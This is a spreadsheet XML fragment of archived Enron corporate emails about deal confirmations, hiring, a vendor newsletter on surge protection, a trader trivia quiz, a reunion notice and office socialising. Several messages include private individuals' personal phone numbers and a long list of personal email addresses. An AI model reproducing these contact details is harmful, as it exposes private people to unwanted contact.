Molly Harris/HOU/ECT@ECT, Cynthia Clark/Corp/Enron@ENRON, Mary G _x000D_
Gosnell/HOU/ECT@ECT, Enron Europe Global Contracts and Facilities, Enron _x000D_
Europe Global CounterParty, Stephanie Sever/HOU/ECT@ECT, Bradley _x000D_
Diebner/HOU/ECT@ECT, Stacey Richardson/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: EOL Credit Responses 07/24/00_x000D_
_x000D_
_x000D_
Please find attached Credit's EOL responses for 7/24/00._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Regards,_x000D_
tm  _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 1 Mar 2001 00:15:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Modesto deals</t>
  </si>
  <si>
    <t xml:space="preserve">Diana stepped out of the office for a minute, but I left the e-mail printout _x000D_
on her desk and I'll talk to her about it when she gets in._x000D_
_x000D_
Kate_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Sharen Cason                           03/01/2001 07:14 AM_x000D_
	_x000D_
_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Modesto deals_x000D_
_x000D_
There are four deals on the no report that look like they sould be _x000D_
confirmed.  Can you take a look at them and check to see why they are coded _x000D_
not to be confirmed?_x000D_
_x000D_
#533919_x000D_
#533931_x000D_
#533932_x000D_
#533934_x000D_
_x000D_
I guess you have seen the email that shows what your computer looks like when _x000D_
you work in (or apparently near) California?  You open it and the screen _x000D_
starts moving around._x000D_
_x000D_
Stay well!_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 10 Jul 2000 02:57:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kevin.mcgowan@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Kevin,_x000D_
_x000D_
Yes, I am available. Please send a resume to Shirley Crenshaw._x000D_
Shirley will call you to set up the time._x000D_
_x000D_
Vince _x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Kevin McGowan @ ENRON                           07/10/2000 09:28 AM_x000D_
	_x000D_
_x000D_
To: Vince J Kaminski/HOU/ECT@ECT, George Hopley/HOU/ECT@ect_x000D_
cc:  _x000D_
Subject: Interview Request_x000D_
_x000D_
I am trying to schedule an interview with a gentleman who is currently a _x000D_
professor at Rice.  We are interested in possibly hiring him in a research _x000D_
capacity in the Coal and Emissions group.  Would you have time to interview _x000D_
him tom'w?  Let me know if you can._x000D_
_x000D_
Thank you_x000D_
_x000D_
Kevin McGowan x-3-7499_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 12 Sep 2000 10:44:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Richard,_x000D_
_x000D_
Bruce Sukaly (a VP of ENA who was formerly with MEGA) recommends this guy _x000D_
highly.  From the looks of his resume, he should know what he is doing and _x000D_
could work in a variety of groups.  Bruce indicated that Joe and his wife _x000D_
just had a baby but are prepared to move to Houston if an opportunity arises._x000D_
_x000D_
Zisman_x000D_
_x000D_
_x000D_
----- Forwarded by Stuart Zisman/HOU/ECT on 09/12/2000 05:41 PM -----_x000D_
_x000D_
	Bruce Sukaly@ENRON_x000D_
	09/12/2000 05:31 PM_x000D_
		_x000D_
		 To: Stuart Zisman/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Re: Question_x000D_
_x000D_
Yes I do.  His name is Joe Limone.  I worked with him at MEGA.  He has a _x000D_
broad background in energy, especially power.  He is a good attorney, _x000D_
hard-working, dedicated and determined.  He is definitely a guy you want in _x000D_
the trenches with you.  I have attached his resume.  </t>
  </si>
  <si>
    <t>Mon, 1 May 2000 04:45:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Well head for May</t>
  </si>
  <si>
    <t>That's fine</t>
  </si>
  <si>
    <t>Thu, 19 Oct 2000 03:50:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jennifer.bagwell@enron.com'})</t>
  </si>
  <si>
    <t>Jennifer Bagwell</t>
  </si>
  <si>
    <t>Are we still on for lunch?</t>
  </si>
  <si>
    <t>Fri, 10 Nov 2000 03:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mnewsletter@mtlnh.com'})</t>
  </si>
  <si>
    <t>frozenset({'dfossum@enron.com'})</t>
  </si>
  <si>
    <t>Surge Protection and Grounding</t>
  </si>
  <si>
    <t>If you have missed any of the Newsletters on IS Barriers in Div 2, Zener_x000D_
Barriers, Ground Monitoring Systems, Surge Protection, Process I/O,_x000D_
Rotational Speed Application, or Intrinsically Safe Pneumatic Valves, please_x000D_
click your reply button and note same._x000D_
_x000D_
Is Grounding a Substitute for Surge Suppression Protection?_x000D_
_x000D_
One of the most common questions regarding Surge Suppression is whether it_x000D_
is necessary when a grounding system exists. Proper grounding is necessary_x000D_
for the Instrumentation and Automation systems in use today, but is no_x000D_
substitute for Surge Suppression equipment in preventing electrical system_x000D_
damage. Grounding should only be part of the strategy in preventing_x000D_
equipment damage from electrical surges._x000D_
_x000D_
An electrical surge is a burst of voltage that lasts only a matter of_x000D_
microseconds but which generates very large amounts of current, and this_x000D_
current must be diverted away from the electrical equipment to be protected._x000D_
Some people hold the opinion that if a grounding system is installed, the_x000D_
electrical system voltage will rise together and lower together and that no_x000D_
damage to the equipment will occur. While this could be true in theory, the_x000D_
reality is that very few installations are isolated from other voltages. For_x000D_
example, the addition of computers with modems or network cards introduces_x000D_
another ground into the system._x000D_
_x000D_
If the two buildings are separated electrically, then the possibility of_x000D_
damage is minimized, but it is more likely that modems or data lines_x000D_
interconnect the buildings. A typical scenario might be:_x000D_
_x000D_
 A lightning strike in the vicinity of one building increases the_x000D_
 ground potential to 200KV._x000D_
_x000D_
 The resistance of the ground decreases this voltage to 15KV_x000D_
 by the time it gets to the ground circuit of that building._x000D_
_x000D_
 As the voltage decreases over the distance to the adjacent_x000D_
 building, it has lowered to 3KV, with a resulting difference_x000D_
 of 12KV._x000D_
_x000D_
In such a case, the voltage difference between the two buildings generates a_x000D_
surge current large enough to destroy the communication lines between the_x000D_
two buildings, and no grounding system can prevent the damage to the_x000D_
communication ports of the computers. Similarly, any instruments mounted_x000D_
outdoors can have the same type of voltage difference from the control panel_x000D_
to which they are connected._x000D_
_x000D_
Therefore, while good grounding is essential, it will not neutralize the_x000D_
potential damage to equipment and processes caused by a surge event._x000D_
_x000D_
To discover how you can benefit from an MTL solution in a variety of_x000D_
applications, visit us at www.mtlnh.com, www.mtl-inst.com, and/or_x000D_
www.telematic.com. You may call MTL at (800) 835-7075 for the location of_x000D_
the MTL Representative nearest to you._x000D_
_x000D_
To unsubscribe, please use your REPLY button and write "Unsubscribe" in the_x000D_
subject line.</t>
  </si>
  <si>
    <t>Sun, 3 Feb 2002 07:37:01 -0800 (PST)</t>
  </si>
  <si>
    <t>Start Date: 2/3/02; HourAhead hour: 10;</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Start Date: 2/3/02; HourAhead hour: 10;  No ancillary schedules awarded.  No variances detected._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2002020310.txt</t>
  </si>
  <si>
    <t>Wed, 18 Oct 2000 09:32:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'peter.keavey@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">transport model_x000D_
---------------------- Forwarded by Scott Neal/HOU/ECT on 10/18/2000 04:31 PM _x000D_
---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Kate Fraser                           08/22/2000 10:53 AM_x000D_
	_x000D_
_x000D_
To: Scott Neal/HOU/ECT@ECT_x000D_
cc: Kyle Etter/HOU/ECT@ECT, Sandra F Brawner/HOU/ECT@ECT _x000D_
Subject: Transport Model for New Deals_x000D_
_x000D_
_x000D_
Scott,_x000D_
_x000D_
Attached below is the transport model I have been using for new deals.  It is _x000D_
set up right now for the Cranberry deal, but Kyle can show you how to modify _x000D_
it for any new deal.  Obviously, I have not been relying heavily on the _x000D_
extrinsic values this model produces._x000D_
_x000D_
Kate_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>frozenset({'mike.grigsby@enron.com', 'phillip.allen@enron.com', 'kim.ward@enron.com', 'barry.tycholiz@enron.com', 'paul.lucci@enron.com', 'stephanie.miller@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">This should probably be researched further.  If they can really build this _x000D_
many plants it could have a huge impact on the Cal border basis.  Obviously _x000D_
it is dependent on what capacity is added on Kern, PGT and TW but it is hard _x000D_
to envision enough subscriptions to meet this demand.  Even if it is _x000D_
subscribed it will take 18 months to 2 years to build new pipe therefore the _x000D_
El Paso 1.2 Bcf/d could be even more valuable._x000D_
_x000D_
_x000D_
Mark_x000D_
_x000D_
_x000D_
----- Forwarded by Mark Whitt/NA/Enron on 02/09/2001 03:04 PM -----_x000D_
_x000D_
	Tyrell Harrison@ECT_x000D_
	Sent by: Tyrell Harrison@ECT_x000D_
	02/09/2001 09:26 AM_x000D_
		 _x000D_
		 To: Barry Tycholiz/NA/Enron@ENRON, Mark Whitt/NA/Enron@Enron, Paul T _x000D_
Lucci/NA/Enron@Enron, Kim Ward/HOU/ECT@ECT, Stephanie _x000D_
Miller/Corp/Enron@ENRON, Phillip K Allen/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: California Gas Demand Growth_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
If you wish to run sensitivities to heat rate and daily dispatch,  I have _x000D_
attached the spreadsheet below._x000D_
_x000D_
_x000D_
Tyrell_x000D_
303 575 6478_x000D_
</t>
  </si>
  <si>
    <t>Sat, 11 Nov 2000 07:21:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'svandyke@gt.com'})</t>
  </si>
  <si>
    <t>RE: Hey!</t>
  </si>
  <si>
    <t xml:space="preserve">Unfortunately I made other plans for the entire weekend before checking the _x000D_
calendar!!!? I wish I was going to be out of town a different weekend.? Are _x000D_
you going to Corvallis?? I will call you next time we are going to be in your _x000D_
part of town, Eric and I wished we could have gone out last night, but it was _x000D_
too late.? I know, we are a losers.? Talk to you soon._x000D_
_x000D_
-----Original Message----- _x000D_
From: Mark.Guzman@enron.com [mailto:Mark.Guzman@enron.com] _x000D_
Sent: Saturday, November 11, 2000 11:47 AM _x000D_
To: SVanDyke@GT.com _x000D_
Subject: RE: Hey! _x000D_
_x000D_
_x000D_
Yeah I like to hassle Eric and? I really kind of miss it actually.? My cell _x000D_
phone number is 503-702-0463 and my home number is 503-228-7767.? I would _x000D_
love to grab a beer with ya sometime.? Are you going to the Civil War Game _x000D_
next weekend? </t>
  </si>
  <si>
    <t>Mon, 5 Jun 2000 02:43:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Development Center Class Reminder  - Wellhead to Burner Tip</t>
  </si>
  <si>
    <t xml:space="preserve">Suzanne:_x000D_
I think that if you call Gracie Presas she can help you._x000D_
Carol_x000D_
_x000D_
_x000D_
_x000D_
	Suzanne Adams_x000D_
	06/05/2000 09:17 AM_x000D_
		_x000D_
		 To: Carol St Clair/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Re: Development Center Class Reminder  - Wellhead to Burner Tip_x000D_
_x000D_
I can't do anything if you did it through Ernie.  It has to come from your _x000D_
computer._x000D_
_x000D_
_x000D_
_x000D_
	Carol St Clair_x000D_
	06/05/2000 09:12 AM_x000D_
		 _x000D_
		 To: Suzanne Adams/HOU/ECT@ECT_x000D_
		 cc: Taffy Milligan/HOU/ECT@ECT, Erica Braden/HOU/ECT@ECT_x000D_
		 Subject: Development Center Class Reminder  - Wellhead to Burner Tip_x000D_
_x000D_
Suzanne:_x000D_
I reserved this class in my own name so that Samantha Boyd, our new legal _x000D_
assistant who is starting today, could attend.  Could you please contact _x000D_
whoever needs to be contacted and switch names._x000D_
_x000D_
Erica,_x000D_
Please put this class on Samantha's calendar._x000D_
_x000D_
Carol  _x000D_
----- Forwarded by Carol St Clair/HOU/ECT on 06/05/2000 09:09 AM -----_x000D_
_x000D_
	Ernie_x000D_
	Sent by: Ernie_x000D_
	06/03/2000 07:01 AM_x000D_
		 _x000D_
		 To: Carol St Clair/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Development Center Class Reminder  - Wellhead to Burner Tip_x000D_
_x000D_
You are scheduled to attend: _x000D_
_x000D_
Wellhead to Burner Tip_x000D_
Class Days and Times:_x000D_
  6/13/2000  08:00:00 AM - 05:00:00 PM_x000D_
  6/14/2000  08:00:00 AM - 12:00:00 PM_x000D_
Room # &amp; Location: EB552,  Houston_x000D_
Participant Fee: $ 600_x000D_
Note: _x000D_
_x000D_
If you are unable to attend this class, the registration must be canceled by _x000D_
5:00 p.m. on  June 8, 2000 to prevent a charge of $ 600 to your RC number.  _x000D_
_x000D_
 We look forward to seeing you at 08:00:00 AM on June 13 - 14, 2000.  Please _x000D_
call the Development Center Team at 713-853-0357 if you have any questions._x000D_
_x000D_
 Thank you._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 4 May 1999 10:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jbakker@mayerbrown.com'})</t>
  </si>
  <si>
    <t>Hey Jeff:_x000D_
_x000D_
I just saw your email address on the Monmouth web site.  I didn't realized _x000D_
you were at Mayer Brown.  I don't even know if we've talked since I left New _x000D_
York (almost 5 years ago).  I'm now in the legal department at Enron Capital _x000D_
&amp; Trade Resources in Houston where my group is responsible for the legal _x000D_
issues in derivatives trading here.  I don't get to Chicago often but if they _x000D_
ever send you down this way, be sure to look me up!_x000D_
_x000D_
C., F. &amp; S.,_x000D_
_x000D_
Mark</t>
  </si>
  <si>
    <t>Mon, 20 Nov 2000 02:24:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Year End PRC Meeting for EWS Legal</t>
  </si>
  <si>
    <t>The year end PRC meeting for EWS Legal will begin at  11:30 AM on Tuesday, _x000D_
December 5, and will continue until all PRC matters are finished.  The _x000D_
meeting will be held in EB16C2 and lunch will be served.  Please plan your _x000D_
calendars accordingly so you can attend this meeting._x000D_
_x000D_
Thank you._x000D_
_x000D_
Janette Elbertson_x000D_
Enron North America Corp._x000D_
Legal Department - EB3326_x000D_
Telephone:  (713) 853-7906_x000D_
Fax:  (713) 646-2600_x000D_
janette.elbertson@enron.com</t>
  </si>
  <si>
    <t>Thu, 28 Dec 2000 04:50:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: NG YEAR ENd Quiz</t>
  </si>
  <si>
    <t xml:space="preserve">what is this???_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Jennifer Fraser                           12/27/2000 12:19 PM_x000D_
	_x000D_
_x000D_
To: Bill Berkeland/Corp/Enron@Enron, John Arnold/HOU/ECT@ECT, Jennifer _x000D_
Shipos/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: NG YEAR ENd Quiz_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Jennifer Fraser/HOU/ECT on 27/12/2000 _x000D_
18:21 ---------------------------_x000D_
_x000D_
_x000D_
RBrown5658@aol.com@wwwww.aescon.com on 27/12/2000 12:04:03_x000D_
Supplemental Bonus question: See no 12---- Is Jeff Shankman's picture there_x000D_
_x000D_
Here is your year end NG quiz.  Forgive pore spelling please!_x000D_
_x000D_
1.   On Jan 4, 2000, what was the settle price of the prompt month Nymex_x000D_
contract?_x000D_
_x000D_
2.   What caused numerous OTC energy brokerages to consolidate or go out of_x000D_
business in 2000?_x000D_
_x000D_
3.   Every 11 years, an astronomical event occurs that correlates with high_x000D_
energy prics.  This is one of those years.  What is the event?_x000D_
_x000D_
4.   What trading company's motto is "unrelenting thinking?"_x000D_
_x000D_
5.   What is intellectual capital?  Where was the idea of it conceived?_x000D_
_x000D_
6.   If a supertrader is wearing a blue shirt with white collar and cuffs,_x000D_
what is the appropriate foot accesory:  red socks, sandals or "spats"?_x000D_
_x000D_
7.   On March 31, 2000, what was the settle of the prompt month Nymex_x000D_
contract?_x000D_
_x000D_
8.   What is the name of a prominent national weather service that doesn't_x000D_
provide intra-day Canadian air temp graphics?_x000D_
_x000D_
9.   What is a "polar pig"?   Who coined the phrase?_x000D_
_x000D_
10.  What do Nicholas Leeson and Value-at-Risk have in common?_x000D_
_x000D_
11.  What type of food is served at the restaurant in Houston which houses_x000D_
the famous bar - "Club No Minors"?_x000D_
_x000D_
12.  What is the name of the small town in Texas where the Natural Gas_x000D_
Traders Hall of Fame is allegedly located?_x000D_
_x000D_
13.  What is the name of the $1.59 grocery store tabloid that predicted our_x000D_
current weather on Sept. 12, 2000?_x000D_
_x000D_
14.  What are the names of the three northern hemisphere weather models used_x000D_
today?_x000D_
_x000D_
15.  In the year 2000, what astrological event had a 100% correlation with_x000D_
counter-trend price moves?_x000D_
_x000D_
16.  On Feb 3, 2001, what astrological event will occur that some floor_x000D_
traders say will affect price of NG?_x000D_
_x000D_
17.  In the year 2000, one Houston oil company paid $160 million to learn the_x000D_
hard way that OPEC can do what?_x000D_
_x000D_
18.  What was the highest IFGMR index posted to date?_x000D_
_x000D_
19.  What city issued warrants for the arrest of several of its gas utility's_x000D_
executives in 2000?_x000D_
_x000D_
20.  Who is the president of Enron Online?_x000D_
_x000D_
21.  During 2000's Shell Open golf tourney, within a 25 cent window what was_x000D_
the average price of the prompt month Nymex contract?_x000D_
_x000D_
22.  What weather event struck Ft. Worth, Texas on March 28, 2000?_x000D_
_x000D_
23.  How many Nobel laureates advised the supertraders at failed Long Term_x000D_
Capital Management?_x000D_
_x000D_
24.  What is a "deal cop"?_x000D_
_x000D_
25.  The AGA states upon its web page that portion of the gas business that_x000D_
it represents.  Which of the following is that group? Traders, marketers,_x000D_
pipelines, utilities, home consumers, producers, industrials?_x000D_
_x000D_
26.  What type of meat product was used to verbally describe AGA's Chris_x000D_
McGill's reaction to the notion that there would be a shortage of gas supply_x000D_
this winter?_x000D_
_x000D_
27.  How many utilities have been rumored to be considering bankruptcy in_x000D_
California due to high energy prices?_x000D_
_x000D_
28.  The original design for Alliance pipeline was conceived where and drawn_x000D_
on what?_x000D_
_x000D_
29.  Which of the following is considered to be improper to put on a_x000D_
Philadelphia Gas Works expense account: business mileage, business meals,_x000D_
business lodging or artworks?_x000D_
_x000D_
30.  At a late night industry party during Gas Fair this year, two female_x000D_
brokers were mistakenly hassled by Houston Police as possibly being of what_x000D_
occupation?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 26 Jul 1999 03:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: SWAP</t>
  </si>
  <si>
    <t xml:space="preserve">I spoke with Dale Neuner (confirm desk) a few minutes ago.  It seems that _x000D_
Scott Neal sent the deal ticket to EI and not ECT.  We have retrieved the _x000D_
ticket and Dale is talking to Scott about having the deal entered into trade _x000D_
capture.  Dale is in touch with Brent and will advise when deal has been _x000D_
entered.  SS_x000D_
_x000D_
_x000D_
From: "Julian Poole/ENRON_DEVELOPMENT" AT ENRON_DEVELOPMENT@CCMAIL on _x000D_
07/26/99 04:07 PM_x000D_
To: Sara Shackleton@ECT, Brent Hendry AT ENRON_DEVELOPMENT@CCMAIL_x000D_
cc: "Don Black/ENRON_DEVELOPMENT" AT ENRON_DEVELOPMENT@CCMAIL _x000D_
Subject: SWAP_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Sara,_x000D_
_x000D_
Was the confirmation sent to C. Puerto?_x000D_
_x000D_
Julian_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 18 Sep 2000 05:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'chris.sonneborn@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'david.marshall@enron.com'})</t>
  </si>
  <si>
    <t>CIG Interconnect agreement</t>
  </si>
  <si>
    <t>David -_x000D_
_x000D_
Gerald Nemec and myself are working on an agreement with CIG to permit us _x000D_
access to install check-measurement equipment on a CIG meter in Wyoming as _x000D_
part of the Lost Creek gathering system project.  Gerald recommended that we _x000D_
have you review the insurance requirements outlined in section 8 of this _x000D_
document._x000D_
_x000D_
 _x000D_
_x000D_
Please let me know if and when you would be able to perform this review and _x000D_
get back with me._x000D_
_x000D_
Regards,_x000D_
Chris Sonneborn_x000D_
ENA Upstream Services_x000D_
Facility Planning</t>
  </si>
  <si>
    <t>Fri, 2 Feb 2001 01:01:00 -0800 (PST)</t>
  </si>
  <si>
    <t>The latest (last?)</t>
  </si>
  <si>
    <t xml:space="preserve">Intended for Mark A. Palmer...._x000D_
---------------------- Forwarded by Mark S Palmer/NA/Enron on 02/02/2001 _x000D_
08:02 AM ---------------------------_x000D_
_x000D_
_x000D_
Vince J Kaminski@ECT_x000D_
02/02/2001 08:45 AM_x000D_
To: Mark S Palmer/NA/Enron@Enron_x000D_
cc: Vince J Kaminski/HOU/ECT@ECT, Christie Patrick/HOU/ECT@ECT _x000D_
_x000D_
Subject: The latest (last?)_x000D_
_x000D_
Mark,_x000D_
_x000D_
I am sending you the final (?) draft of the paper by John Martin_x000D_
on Enron's transformation. John Martin is a prof from Baylor who visited us _x000D_
a few weeks ago._x000D_
_x000D_
Can you take a look at the paper and bless it. I haven't read this last _x000D_
version_x000D_
of the paper yet and I will go through it on weekend._x000D_
_x000D_
Vince_x000D_
_x000D_
---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 02/02/2001 _x000D_
08:44 AM ---------------------------_x000D_
_x000D_
_x000D_
"John D. Martin" &lt;J_Martin@baylor.edu&gt; on 02/01/2001 04:15:36 PM_x000D_
To: vkamins@enron.com_x000D_
cc:  _x000D_
Subject: The latest (last?)_x000D_
_x000D_
_x000D_
Vince,_x000D_
_x000D_
Attached is my latest attempt to wrap everything together.  Our timetable_x000D_
is very short as we need an "approved by Enron" version of the paper to Don_x000D_
by next Wednesday.  Don has already made editorial changes for us and may_x000D_
make some additional "writing style" changes but he doesn't change the_x000D_
content._x000D_
_x000D_
I'll give you a call later today to alert you to the e-mail._x000D_
_x000D_
take care,_x000D_
_x000D_
john_x000D_
_x000D_
p.s. i had a nice conversation with steve.  sounds like he's landed a_x000D_
pretty good contract with Wiley._x000D_
_x000D_
 _x000D_
 - Enron_Paper_2_1_01.doc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_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 14 Mar 2001 15:02:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jmaas@llgm.com'})</t>
  </si>
  <si>
    <t>Re: LV Interconnection Agreement</t>
  </si>
  <si>
    <t xml:space="preserve">I will check with Andrea and provide some times as soon as possible tomorrow _x000D_
- I think Andrea and I (or myself if Andrea is not available) should be _x000D_
sufficient.  Thanks.  JM_x000D_
</t>
  </si>
  <si>
    <t>ET&amp;S United Way Sundae Wednesday</t>
  </si>
  <si>
    <t>CALENDAR ENTRY:	APPOINTMENT_x000D_
_x000D_
Description:_x000D_
	ET&amp;S United Way Sundae Wednesday _x000D_
_x000D_
Date:		8/16/2000_x000D_
Time:		1:30 PM - 2:30 PM (Central Standard Time)_x000D_
_x000D_
Chairperson:	Outlook Migration Team_x000D_
_x000D_
Detailed Description:</t>
  </si>
  <si>
    <t>Fri, 5 Jan 2001 01:26:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jpainter@igservice.com'})</t>
  </si>
  <si>
    <t>frozenset({'jfawcet@enron.com', 'mlokay@enron.com'})</t>
  </si>
  <si>
    <t>January 5th Daily Update</t>
  </si>
  <si>
    <t>Jeff / Michelle,_x000D_
_x000D_
Here's the Daily Update for the 5th ..._x000D_
Despite all those irons in the fire you have right now, hope you both_x000D_
get a chance to enjoy your weekend._x000D_
_x000D_
Suzanne_x000D_
_x000D_
 - IGSUpdate.xls</t>
  </si>
  <si>
    <t>Tue, 11 Apr 2000 15:42:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'texasatm@aol.com'})</t>
  </si>
  <si>
    <t>frozenset({'amdavila@netzero.net', 'chezjason@aol.com', 'mellyjo7@aol.com', 'eheiberg@earthlink.net', 'jgarman@aeriform.com', 'markhude@worldnet.att.net', 'kentk@pearlstprods.com', 'jak@stateside.com', 'michelle_tull@dell.com', 'susanschuh@aol.com', 'kelli.l.stevens@usahq.unitedspacealliance.com', 'ggomez@bisys.com', 'lersmartin@aol.com', 'jgreenhall@ucsd.edu', 'saxtonn_2000@yahoo.com', 'geneen.pipher@ttmc.ttuhsc.edu', 'martinec@ev1.net', 'phillip.m.love@enron.com', 'oxkd@aol.com', 'jnewberry@reboul.com', 'pjgreen@gil.com.au', 'charelle@clearpoint-technology.com', 'ross_mcglothlin@hotmail.com', 'newlyons@aol.com', 'katherine.l.nuernberg1@jsc.nasa.gov', 'astauffe@avalon.net', 'c_s_weaver@hotmail.com', 'aprilbrowning@excite.com', 'liztriem@msn.com', 'tinteardrop@hotmail.com', 'a.daly@juno.com', 'mwidmer@databasecity.com', 'klk@gradeschool.com'})</t>
  </si>
  <si>
    <t>Reunion</t>
  </si>
  <si>
    <t>Hi Everybody,_x000D_
It is hard to believe but our 10 year reunion is fast approaching. I am_x000D_
trying to organize everything I would like to get a good address on all of_x000D_
you. The reunion will be September 23rd at the Clear Lake Hilton.  The first_x000D_
mailout about the reunion is expected to go out in May. I am trying to verify_x000D_
some address information before then.  If you could email me back with your_x000D_
correct address, phone number and email address (I assume I have the right_x000D_
one) that would help.  Next week we will be launching our Clear Lake High_x000D_
School class of 1990 reunion web page.  You will be able to find out updates_x000D_
on the reunion and see who is coming and get lots of additional information_x000D_
on the website.  At least, that is the plan as of today.  If you can spread_x000D_
the work about the website it would be appreciated.  The address will be_x000D_
www.clhs90.com._x000D_
_x000D_
I will send out more information as I put it together.  If anyone needs to_x000D_
get a hold of me you can reach me at this email address or my home number_x000D_
(703) 532-8881.  I hope everyone is doing well and I look forward to seeing_x000D_
everyone in September.  If you have additional addresses of fellow classmates_x000D_
you can send me that would be very helpful._x000D_
_x000D_
Jennifer Kerber</t>
  </si>
  <si>
    <t>Mon, 23 Apr 2001 09:03:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: California Interstate Pipelines</t>
  </si>
  <si>
    <t>You available to talk today?</t>
  </si>
  <si>
    <t>Thu, 9 Aug 2001 14:38:06 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'luis.velez@enron.com'})</t>
  </si>
  <si>
    <t>FW: Traders/Fundamentals Happy Hour</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Dimitry, Dirk  _x000D_
Sent:	Friday, August 03, 2001 1:35 PM_x000D_
To:	Crane, Bob; Conner, Andrew R.; Richard, Robert; Rickard, Craig; Chen, Will; Epstein, Jay; Comeaux, Clinton; Gerard, Camille; Burlison, Joe; Deadwyler, Erik; Daniel, John; Tamm, Mike; Gaughan, Brian; Reed, Andrea V.; Allan, David_x000D_
Cc:	Causholli, Monika; Velez, Luis; Singh, Vikram; Johnson, Jay; Daetz, Milagros_x000D_
Subject:	Traders/Fundamentals Happy Hour_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Just wanted to make sure with everyone that next Thursday, August 9th, is agreeable for the fundamentals to pay off their loss on July's challenge. We were thinking of Ruggles Downtown on Main St. at 5pm until whenever the party closes. </t>
  </si>
  <si>
    <t>Wed, 13 Dec 2000 23:28:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: cannon assignment</t>
  </si>
  <si>
    <t xml:space="preserve">Daren,_x000D_
_x000D_
Should I change the counterparty on this sale, or is that handled by _x000D_
marketing?  Also, we may need to look at changing the Storage Agmt.   Please _x000D_
advise._x000D_
_x000D_
Mary_x000D_
---------------------- Forwarded by Mary Poorman/NA/Enron on 12/14/2000 07:26 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Julie Meyers@ECT_x000D_
12/13/2000 05:12 PM_x000D_
To: Mary Poorman/NA/Enron@Enron, Jackie Young/HOU/ECT@ECT, Aimee _x000D_
Lannou/HOU/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Re: cannon assignment_x000D_
_x000D_
_x000D_
Has the volumes for the deal below been nomd' yet under the new deal.  Credit _x000D_
is having a cow because they are showing exposure still under Cannon.  Is _x000D_
there a way that we can get this done tomorrow?_x000D_
_x000D_
Julie_x000D_
_x000D_
---------------------- Forwarded by Julie Meyers/HOU/ECT on 12/13/2000 05:05 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Julie Meyers_x000D_
12/12/2000 05:03 PM_x000D_
To: Mary Poorman/NA/Enron@Enron, Jackie Young/HOU/ECT@ECT, Aimee _x000D_
Lannou/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: cannon assignment_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Julie Meyers/HOU/ECT on 12/12/2000 04:58 _x000D_
PM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Robert Cotten                           12/12/2000 03:29 PM_x000D_
	_x000D_
_x000D_
To: Julie Meyers/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: cannon assignment  _x000D_
_x000D_
Julie,_x000D_
_x000D_
Cannon is not a wellhead producer.  The meters below are assigned to the _x000D_
following individuals:_x000D_
_x000D_
